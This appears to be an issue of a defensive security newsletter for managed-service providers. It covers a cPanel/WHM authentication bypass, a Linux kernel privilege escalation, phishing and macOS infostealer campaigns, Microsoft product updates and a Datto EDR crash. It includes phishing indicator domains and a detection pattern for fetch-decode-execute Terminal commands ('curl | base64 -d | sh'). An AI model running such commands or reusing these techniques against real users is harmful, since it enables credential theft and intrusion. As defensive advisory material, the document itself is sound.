CISA added CVE-2026-41940 to the Known Exploited Vulnerabilities catalog on April 30 with the knownRansomwareCampaignUse: Known flag and a remediation due date of May 3 — three days after addition. This is the CVE that was assigned to the cPanel and WHM authentication-bypass that hosting providers including Namecheap blocked TCP 2083 and 2087 behind a firewall on April 28 while waiting for the patch. ENKVA #002 covered the emergency in real time without a CVE number; the number is now public, the CVSS is 9.8 (v3.1) / 9.3 (v4.0), and CISA has confirmed both exploitation in the wild and ransomware-operator use.

The vulnerability lives in cPanel's login flow and lets unauthenticated remote attackers gain full access to the control panel. Affected versions are cPanel and WHM 11.40.0.0 and later; the VulnCheck advisory lists fixed versions as 11.86.0.41, 11.94.0.28, 11.102.0.39, and the latest patched build 11.136.0.5. WP Squared is fixed at 11.136.1.7 or later.

If you manage cPanel directly, the patch is the easy half. The hard half is auditing what happened during the eight days between the cPanel emergency advisory (April 28) and now. The KEV Known ransomware flag is CISA's signal that operators were already using this in named campaigns by the time the catalog updated, and a control-panel-level account on a hosting server is the kind of foothold ransomware affiliates monetize on the same day.

What to do this week:

1. Confirm the patched build is installed. Run whmapi1 get_current_lts_expiration_status and /usr/local/cpanel/cpanel -V on every cPanel/WHM server to confirm version. Anything below the fixed builds above is exposed.

2. Audit cPanel and WHM accounts for unfamiliar logins between April 28 and the install time of your patch. Look at /usr/local/cpanel/logs/access_log, /usr/local/cpanel/logs/login_log, and /var/cpanel/accounting.txt. Treat any successful authentication from an unfamiliar IP during that window as suspect, even if the account is yours. The bypass produces a real session — log entries look like normal authentication.

3. Rotate WHM root, reseller, and any account passwords that were valid during the exposure window. Rotate API tokens too. The CVSS 9.8 vector means the attacker doesn't need credentials to get in, but they may have created or modified credentials once they did.

4. If you resell cPanel hosting through a provider, demand written confirmation of patch status and post-patch audit results. "We applied the firewall block and unblocked when the patch shipped" is not the same answer as "we patched, and we found no anomalous logins during the exposure window." If the provider can't say the second sentence, plan for the possibility that some shared infrastructure was touched.

5. Restrict the WHM management interface to a VPN or IP allowlist. Internet-reachable WHM on TCP 2087 is the same risk class as internet-reachable RMM management interfaces — last week's KEV adds covered the RMM version of this lesson.

The CVE-2026-41940 timeline is unusually compressed: cPanel emergency advisory on April 28, public CVE assignment April 29, KEV addition April 30 with a Known ransomware flag, three-day federal compliance deadline. The May 3 KEV due date has already passed — treat it as a floor, not a target.

Advisories

Brief 1 — Linux kernel "Copy Fail" CVE-2026-31431 added to KEV May 1

CISA added CVE-2026-31431 to KEV on May 1 with a due date of May 15. The vulnerability — disclosed by Theori as "Copy Fail" — is a logic bug in the kernel's algif_aead AEAD socket interface that lets an unprivileged local user gain root via a deterministic 4-byte write into the page cache of any readable file. CVSS 7.8 (NVD entry). The fix mostly reverts commit 72548b093ee3 from 2017, so the bug is present in every kernel released since 2017. Help Net Security's writeup confirms exploitation against Ubuntu 24.04 LTS, Amazon Linux 2023, RHEL 10.1, SUSE 16, and Rocky Linux 9.7.

Action: push kernel updates to your Linux fleet this week. The algif_aead module is built into the kernel on most distros (CONFIG_CRYPTO_USER_API_AEAD=y), so the usual modprobe.d blacklist trick does not actually disable it — patching is the only path. Red Hat fixed kernels were not yet available at time of writing; if you run RHEL endpoints, watch the Red Hat advisory and queue the update for the moment it lands. Container hosts that grant AF_ALG socket access are the highest-priority targets.

Brief 2 — "Code of Conduct" multi-stage AiTM campaign hit 35,000 users across 13,000 organizations

Microsoft Threat Intelligence published an analysis on May 4 of a phishing campaign that targeted more than 35,000 users across over 13,000 organizations in 26 countries, with 92% of targets located in the United States. Sectors most affected: Healthcare and Life Sciences (19%), Financial Services (18%), Professional Services (11%), and Technology and Software (11%). The chain runs: compliance-themed email with PDF → Cloudflare CAPTCHA-protected attacker domain → image-CAPTCHA staging page → fake Microsoft sign-in → adversary-in-the-middle token capture. Indicator domains include compliance-protectionoutlook[.]de and acceptable-use-policy-calendly[.]de, and PDF lures use the filename pattern "Awareness Case Log File – [Day] [Date], April 2026.pdf".

Action: add the Microsoft IoC domains to your block lists today. Phishing-resistant MFA (passkeys, FIDO2 security keys, certificate-based authentication) is the durable defense — token-replay attacks succeed against TOTP, push, and SMS but fail against keys bound to the origin. If your tenants are on TOTP or push-only MFA, this campaign is your forcing function to move them. Enable Zero-Hour Auto Purge in Defender for Office 365 for any tenants that don't have it on, and turn on automatic attack disruption in Defender XDR if you have an E5 license.

Brief 3 — Chrome 148 ships 127 security fixes including three Critical use-after-frees

Google promoted Chrome 148.0.7778.96/97 (Windows/Mac) and 148.0.7778.96 (Linux) to stable on May 5 with 127 security fixes — for context, the previous stable update (Chrome 147.0.7727.137/138 on April 28) shipped 30 fixes. Three of the 127 are rated Critical: CVE-2026-7896 (integer overflow in Blink), CVE-2026-7897 (use-after-free in Mobile), and CVE-2026-7898 (use-after-free in Chromoting). Release notes. Microsoft Edge will inherit the Chromium fixes on its own update cadence.

Action: push the update via your endpoint management tool this week and set the minimum Chrome version to 148.0.7778.96 (Linux) / 148.0.7778.96/97 (Windows/Mac). Chrome 147 reaches end of security support once 148 finishes rollout, so any device still on 147.x after the next maintenance window is unpatched.

Brief 4 — Microsoft details ClickFix macOS infostealer campaign

Microsoft's Threat Intelligence team documented three ClickFix macOS campaigns that ran February through April 2026. The lure: Squarespace, Medium, and Craft note pages claiming to fix common macOS issues, instructing users to paste Base64-encoded Terminal commands. The payload is one of three infostealers — Shub Stealer (self-identifies in code as "SHub Stealer"), Macsync, and AMOS — which exfiltrate browser credentials and cookies, Keychain entries, iCloud account data, cryptocurrency wallet keys, SSH keys, and Telegram data.

Action: if you manage macOS endpoints, brief users to treat any webpage instructing them to paste a Terminal command as a phishing attempt. Defender for Endpoint on macOS detects all three families — confirm cloud-delivered protection and EDR-in-block-mode are on. For tenants without Defender on macOS, watch for Terminal sessions executing curl | base64 -d | sh patterns or sequences invoking gunzip and osascript together.

Product changes

Brief 5 — Defender XDR adds identity-focused hunting graph scenarios

The May 2026 entry on the Defender XDR What's new page documents new predefined scenarios in the advanced hunting graph: Kerberoast and AS-REP roast paths, domain compromise routes, OAuth application risks, and external user access to cloud resources. The graph spans on-premises Active Directory and Entra ID, so a single query can trace a privilege-escalation path that crosses the hybrid boundary.

Action: open the hunting graph in the Defender portal, run the OAuth application risks scenario against each tenant, and triage anything flagged. A malicious OAuth app with Mail.Read consent reads mail without triggering a sign-in alert, so consent grants tend to slip past sign-in-centric monitoring. The Kerberoast and AS-REP scenarios are most useful for tenants with on-premises AD and any service accounts using SPNs.

Brief 6 — Intune service release 2604 lands with EPM expansion, Edge v139 baseline, Apple device support

The Intune What's new page documents service release 2604 for the week of April 27. Highlights: Endpoint Privilege Management approved-elevation requests now work for all users on a device, not just the primary or enrolling user — a fix for shared workstations. The Microsoft Edge v139 security baseline is available with new and updated default settings. Apple userless ADE for visionOS 26+ and tvOS 26+ lets you enroll Vision Pro and Apple TV through Apple Business/School Manager. Ubuntu 26.04 LTS is supported (Ubuntu 22.04 LTS support ends August 2026). The Intune Management Extension minimum version on Windows is now 1.58.103.0 — earlier versions stop receiving Win32 app, PowerShell script, remediation, and platform-script payloads.

Action: check the IME version on your Windows fleet (Get-WmiObject -Class Win32_Product -Filter "Name='Microsoft Intune Management Extension'") and trigger a refresh on anything below 1.58.103.0 — silently broken Win32 app deployment is the failure mode here. Re-import the Edge security baseline if you maintain a custom version with deltas.

Brief 7 — Entra ships May 2026 GA wave: iOS CBA, GSA iOS client, Cloud Firewall, PIM enforcement

The Entra What's new page lists a substantial general-availability batch for May. Certificate-based authentication on native iOS sign-ins as a second factor is GA, addressing prior known issues — CBA also moves to the third option in system-preferred MFA methods. The Global Secure Access iOS client is GA. GSA Cloud Firewall for Remote Networks lets administrators apply 5-tuple filtering to all internet traffic from branch offices through GSA. Conditional Access enforcement on every PIM activation is GA, so role activation can require fresh MFA or device-compliance evaluation. Configurable Token Lifetime Policies are GA, restoring per-tenant control over access, ID, and SAML token lifetimes.

Action: if you maintain CBA policies for tenants on iOS, retest the second-factor flows against the GA build before assuming the prior preview-version issues are gone. Turn on Conditional Access enforcement on PIM activation for any tenant where role assignments drift between MFA states — a finance executive with eligible Global Admin who activates from an unmanaged device should re-prompt, even if the morning sign-in did not.

Field notes

Brief 8 — Datto EDR v13426 AMSI integration crashes Microsoft Word on file open

A r/msp PSA documents that Datto EDR v13426 (released April 17 per the release notes) introduced AMSI integration whose DLL — damsi_com_011.dll under C:\ProgramData\CentraStage\AEMAgent\RMM.AdvancedThreatDetection\amsi\ — crashes Microsoft Word with exception 0xc0000005 (access violation) when opening files. The crash hits SharePoint, OneDrive, and Teams documents most reliably; Event Viewer Application log Event ID 1000 names WINWORD.EXE as the faulting application and damsi_com_011.dll as the faulting module. Clearing %LOCALAPPDATA%\Microsoft\Office\16.0\OfficeFileCache produces a temporary fix that recurs on the next scan cycle. A Kaseya engineer confirmed in-thread that the R&D team is investigating.

Action: if you manage Datto EDR, the workaround documented in the thread is to disable Scripts in the real-time-protection policy (Datto EDR > Policy > Real-time Protection > Real-time Options > Disable Scripts), which stops the injection immediately on the next policy sync. This neutralizes script-based AMSI scanning, so use it as a temporary measure and re-enable when Kaseya ships a fixed agent. If you see correlated svchost.exe or ntdll.exe crashes around the same upgrade window, investigate them on their own merits — the PSA author flagged them as possible collateral but not confirmed.